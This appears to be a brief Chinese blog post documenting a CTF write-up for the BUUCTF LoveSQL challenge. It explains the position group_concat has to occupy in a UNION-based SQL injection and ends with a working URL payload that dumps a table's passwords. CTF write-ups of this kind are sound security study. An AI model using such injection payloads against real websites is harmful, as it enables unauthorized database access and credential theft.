NineOnee

导航

 

sql注入中联合查询group_concat位置

前言

  • 题目环境 buuctf中[极客大挑战 2019]LoveSQL
  • 联合查询中group_concat位置

思路

普通姿势

直到

可以看到报错,但我们的语句并没有任何错误

换到第三个位置就可以正常显示


本地实验也是会报错


最终payload都是在最后一个位置上

?username=amin%27union select 11,33,group_concat(password)from l0ve1ysq1--+%2B&password=222

posted on 2020-11-21 21:48  NineOne_E  阅读(238)  评论(0编辑  收藏  举报